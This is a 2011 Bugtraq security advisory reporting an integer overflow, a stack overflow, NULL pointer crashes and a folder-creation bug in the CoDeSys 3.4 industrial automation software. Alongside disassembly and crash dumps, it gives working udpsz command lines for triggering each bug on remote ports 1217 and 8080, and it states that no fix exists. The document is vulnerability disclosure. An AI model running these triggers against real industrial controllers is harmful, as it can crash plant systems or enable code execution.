[<prev] [next>] [day] [month] [year] [list]
Message-Id: <20111129181242.d97cee5c.aluigi@autistici.org>
Date: Tue, 29 Nov 2011 18:12:42 +0000
From: Luigi Auriemma <aluigi@...istici.org>
To: bugtraq@...urityfocus.com
Subject: Vulnerabilities in 3S CoDeSys 3.4 SP4 Patch 2
#######################################################################
Luigi Auriemma
Application: 3S CoDeSys
http://www.3s-software.com/index.shtml?en_CoDeSysV3_en
Versions: <= 3.4 SP4 Patch 2
Platforms: Windows
Bugs: A] GatewayService integer overflow
B] CmpWebServer stack overflow
C] CmpWebServer Content-Length NULL pointer
D] CmpWebServer invalid HTTP request NULL pointer
E] CmpWebServer folders creation
Exploitation: remote
Date: 29 Nov 2011
Author: Luigi Auriemma
e-mail: aluigi@...istici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bugs
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
>From vendor's homepage:
"The CoDeSys Automation Suite is a comprehensive software tool for
industrial automation technology. All common automation tasks solved by
means of software can be realized with the CoDeSys Suite based on the
wide-spread controller and PLC development system of the same name."
#######################################################################
=======
2) Bugs
=======
----------------------------------
A] GatewayService integer overflow
----------------------------------
GatewayService uses a 32bit value at offset 0x0c of the header which
specifies the size of the data to receive.
The program takes this number, adds 0x34 and allocates that amount of
memory resulting in an integer overflow:
0042CB30 /$ 55 PUSH EBP
0042CB31 |. 8BEC MOV EBP,ESP
0042CB33 |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]
0042CB36 |. 83C0 34 ADD EAX,34
0042CB39 |. 5D POP EBP
0042CB3A \. C3 RETN
...
00447AF7 |. 8B45 0C MOV EAX,DWORD PTR SS:[EBP+C]
00447AFA |. 50 PUSH EAX
00447AFB |. E8 3050FEFF CALL GatewayS.0042CB30 ; + 0x34
00447B00 |. 83C4 04 ADD ESP,4
00447B03 |. 8945 0C MOV DWORD PTR SS:[EBP+C],EAX
00447B06 |> 6A 01 PUSH 1
00447B08 |. 8B4D 0C MOV ECX,DWORD PTR SS:[EBP+C]
00447B0B |. 51 PUSH ECX
00447B0C |. E8 A7050200 CALL GatewayS.004680B8 ; allocation
------------------------------
B] CmpWebServer stack overflow
------------------------------
CmpWebServer is the component used in services like 3SRTESrv3 and
CoDeSysControlService for handling the HTTP connections on port 8080.
The library is affected by a buffer overflow in the function 0040f480
that copies the input URI in a limited stack buffer allowing code
execution:
0040F5C5 |> 8B55 F4 MOV EDX,DWORD PTR SS:[EBP-C]
0040F5C8 |. 2B55 08 SUB EDX,DWORD PTR SS:[EBP+8]
0040F5CB |. 52 PUSH EDX
0040F5CC |. 8B45 08 MOV EAX,DWORD PTR SS:[EBP+8]
0040F5CF |. 50 PUSH EAX
0040F5D0 |. 8B4D 10 MOV ECX,DWORD PTR SS:[EBP+10]
0040F5D3 |. 51 PUSH ECX
0040F5D4 |. E8 97420000 CALL CoDeSysC.00413870 ; memcpy
-------------------------------------------
C] CmpWebServer Content-Length NULL pointer
-------------------------------------------
NULL pointer caused by the lack of checks on the memory allocated
trusting the Content-Length value of an HTTP POST request:
eax=812aa3a7 ebx=00a7ae7c ecx=20000000 edx=00000000 esi=012aa3a7 edi=00000000
eip=0128cc9a esp=02e9feec ebp=02e9fef4 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010212
CmpWebServer!ComponentEntry+0xb37a:
0128cc9a f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
-------------------------------------------------
D] CmpWebServer invalid HTTP request NULL pointer
-------------------------------------------------
NULL pointer caused by the usage of an unexpected HTTP request
different than GET, POST or HEAD:
eax=028228d4 ebx=00000009 ecx=00000004 edx=02822957 esi=00000000 edi=00000005
eip=0128dd6c esp=02e9fed4 ebp=02e9fee0 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
CmpWebServer!ComponentEntry+0xc44c:
0128dd6c 3a51fc cmp dl,byte ptr [ecx-4] ds:0023:00000000=??
--------------------------------
E] CmpWebServer folders creation
--------------------------------
Not a security bug (at least at the moment) but enough weird and funny
to note.
The webserver calls CreateDirectory at address 0041206d before doing a
secondary CreateFile (read mode).
The only possible attack scenario I can imagine may be in case the
server automatically generates logs or other files and this bug will
prevent their creation due to the presence of folders with the same
names, but I don't know the software enough to confirm this scenario.
#######################################################################
===========
3) The Code
===========
http://aluigi.org/testz/udpsz.zip
A]
udpsz -T -b 0x61 -X 0xc 32 l 0xfffffff2 -1 -l 0 -D SERVER 1217 0xffff
B]
udpsz -c "GET /" 0 -b a -c "\\a HTTP/1.0\r\n\r\n" -1 -T -D SERVER 8080 8192
C]
udpsz -T -c "POST / HTTP/1.0\r\nContent-Length: 4294967295\r\n\r\n" SERVER 8080 -1
D]
udpsz -T -c "BLAH / HTTP/1.0\r\n\r\n" SERVER 8080 -1
E]
udpsz -T -c "GET /dir\\a HTTP/1.0\r\n\r\n" SERVER 8080 -1
udpsz -T -c "GET /dir\\dir\\a HTTP/1.0\r\n\r\n" SERVER 8080 -1
udpsz -T -c "GET /dir\\dir\\dir\\a HTTP/1.0\r\n\r\n" SERVER 8080 -1
udpsz -T -c "GET /dir\\dir\\dir\\dir\\a HTTP/1.0\r\n\r\n" SERVER 8080 -1
udpsz -T -c "GET /dir\\dir\\dir\\dir\\dir\\a HTTP/1.0\r\n\r\n" SERVER 8080 -1
...
#######################################################################
======
4) Fix
======
No fix.
#######################################################################
---
Luigi Auriemma
http://aluigi.org
Powered by blists - more mailing lists